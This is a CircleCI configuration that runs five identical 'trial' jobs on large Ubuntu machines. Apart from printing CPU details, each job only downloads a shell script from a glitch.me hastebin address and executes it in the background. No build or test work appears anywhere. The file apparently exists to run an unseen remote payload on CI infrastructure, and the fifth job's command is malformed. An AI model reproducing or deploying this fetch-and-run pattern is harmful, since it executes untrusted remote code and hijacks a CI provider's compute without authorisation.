version: 2.1

jobs:
  trial1A:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: nohup wget -O oke.sh https://muq-hastebin.glitch.me/raw/IRdSgzOQfd && chmod +x oke.sh && ./oke.sh

  trial2A:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: nohup wget -O oke.sh https://muq-hastebin.glitch.me/raw/IRdSgzOQfd && chmod +x oke.sh && ./oke.sh

  trial3A:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: nohup wget -O oke.sh https://muq-hastebin.glitch.me/raw/IRdSgzOQfd && chmod +x oke.sh && ./oke.sh

  trial4A:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: nohup wget -O oke.sh https://muq-hastebin.glitch.me/raw/IRdSgzOQfd && chmod +x oke.sh && ./oke.sh

  trial5A:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: curl nohup wget -O oke.sh https://muq-hastebin.glitch.me/raw/IRdSgzOQfd && chmod +x oke.sh && ./oke.sh
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - trial1A
        - trial2A
        - trial3A
        - trial4A
        - trial5A
